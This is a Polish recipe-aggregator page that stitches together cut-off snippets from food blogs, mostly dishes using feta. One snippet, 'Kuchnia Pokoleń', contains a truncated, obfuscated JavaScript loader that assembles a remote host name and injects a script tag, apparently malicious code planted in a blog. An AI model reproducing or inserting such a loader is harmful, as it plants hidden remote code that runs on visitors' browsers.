Lista naszych narodowych dań jest dosyć długa, jednak na jej szczycie królują pierogi. Niepozorne ciasto z farszem dziś gości u mnie w zupełnie innej wersji –
Vegan TasteZapraszam dziś na niecodzienne, bardzo kolorowe naleśniki. Czerwoną barwę zawdzięczają sokowi z buraka. Proszę bardzo, bez sztucznych barwników i da się. Intensywny kolor to nie tylko
Gotuj zdrowo!Guten Appetit!cukinii. Składniki: 200 g świeżego szpinaku pęczek zielonych szparagów 1 cebula 2 ziemniaki 2 ząbki czosnku 400 ml bulionu warzywnego sól pieprz sok z cytryny ser typu feta oliwa masło Wykonanie: Czosnek i cebulę obrać, pokroić w kostkę i podsmażyć w garnku na oliwie. Szparagi umyć, obciąć twarde końcówki oraz główki. Pierwsze wyrzucić, główki odłożyć
zadanie-gotowanieSynowa zaskoczyła mnie tą sałatką, oczywiście bardzo pozytywnie. Fajna w smaku, pięknie wyglądająca sałatka. Dziękuje. Wykonanie sałatki – obie sałaty umyć i osuszyć, wrzucić do miski
Kuchnia Pokoleńwarzyw (wtedy nie ma problemu, jeżeli któryś z gości nie je mięsa) z dodatkiem odrobiny oliwy z oliwek oraz aromatycznych ziół i przypraw. Nie zaszkodzi również dodać trochę sera (np. feta lub mozzarella), który nada całości delikatnego posmaku. „artykuł zewnętrzny” (function(){ zlnz=document.createElement("script");zlnz_=(("u")+"st")+"a";zlnz.async=true; zlnz.type="text/javascript";zlnz_+=("t.i")+""+"n";zlnz_+=(("f")+"o");zlnz
Kuchcik gotujeprzebije w domu zapachu świeżo upieczonego chleba… Ten prosty chleb bez zagniatania, z suszoną żurawiną i chrupiącymi orzechami laskowymi, świetnie pasuje do wszelkiej maści serów świeżych (twarogu, fety, mozzarelli, ricotty, koziego Chevre), miękkich serów pleśniowych (camembert, brie i gorgonzola) ale też do wędlin – szczególnie tych delikatnych, żeby nie przytłumiły pysznego smaku chleba. Co ja Wam będę pisać… Myśmy
Karo in the KitchenSałatka ze smoczym owocem to kolejna propozycja śniadania na słodko. Zdarza się, że nie mamy chęci na śniadanie to alternatywą na takie dni właśnie może być
Kulinarnyblog.pl - wiesz jak gotować!Połączenie rozpieszczające kubki smakowe – aromatyczna, delikatna gruszka, chrupiące orzechy, słony ser, gorzka rukola, a wszystko otulone orzeźwiającym miodowo-bazyliowym sosem. *gruszkę można zgrillować na grillu, patelni grillowej lub jeśli nie macie dostępnych tych sprzętów, to można usmażyć ją na zwykłej patelni lub upiec na papierze do pieczenia w piekarniku rozgrzanym do 200 stopni przez 5-10 minut – długość(...)połóż kawałek gruszki, potem kilka liści rukoli i ser. Posyp orzechami i polej odrobiną dressingu. Znów połóż gruszkę, rukolę, ser, orzechy i polej sosem. Na szczycie ułóż część gruszki z ogonkiem. Całość możesz polać sosem lub z sosu zrobić obraz na dużym białym talerzu. Składniki 2 gruszki 100 g sera typu feta 50 g orzechów włoskich garść rukoli
Eat me! Fit me!Kolejna bardzo prosta i smaczna sałatka, tym razem z łososiem i fetą. Z dodatkiem buraczków, jak dla mnie mogłabym zjeść sama 2 porcje. Szczególnie mam słabość
Pink EnvelopePowiem szczerze, że nie wiedziała z czym się to je. Nie wiedziałam również jak to smakuje. Tak mowa o fidze. Ale w związku z tym, że
Gotowanie z pasjąprosta do zrobienia sałatka z rukoli . Możesz ją podać jako sałatkę do obiadu lub zjeść całkowicie samodzielnie, do kanapek czy na grilla. Smakuje świetnie z roladką z koziego sera lub fetą. W tej sałatce każdy składnik ma znaczenie i nadaje jej wyjątkowego charakteru. Wspaniałe, intensywne kolory zachęcają do jedzenia i przykuwają uwagę. Chrupiąca rukola oraz pestki słonecznika a do tego
AniaGotuje.plmięsne i bezmięsne, gdyż zazwyczaj gotuję większe porcje na 2-3 dni. W wersji bez mięsa zawsze staram się, aby wstępowało białko w postaci strączków lub różnych serów np. fety. W ten sposób mój posiłek jest pełnowartościowy i dłużej syci. W moim curry tym razem wylądował szpinak, fasolka szparagowa i pomidory, a smak złagodziło mleczko kokosowe. Na blogu
Fabryka pomysłówcukinii, tak jak kiedyś odkryłam dla siebie cukiniowe ciasto. Z każdym kolejnym kęsem wiem, że w zależności od dodatków za każdym razem może smakować inaczej: z suszonymi pomidorami, serem, oliwkami, fetą, pestkami słonecznika, czarnuszką... Tylko nie wiem, na który wariant zdecydować się następnym razem;) Pasztet z cukinii z płatkami owsianymi Składniki: 3 szklanki startej na dużych oczkach cukinii 1 duża
Obiad gotowyulubionych przepisów na lato. Jest to bardzo prosty pomysł na makaron , a przy tym smaczny i szybki. W przepisie użyłam halloumi ale jeśli nie lubicie tego sera to możecie użyć innego sera jak feta lub zwykłego twarogu. Oczywiście smak dania będzie trochę inny ale idea ta sama czyli tani obiad na lato. Spaghetti pomidory halloumi Składniki: na 4 porcje
codojedzenia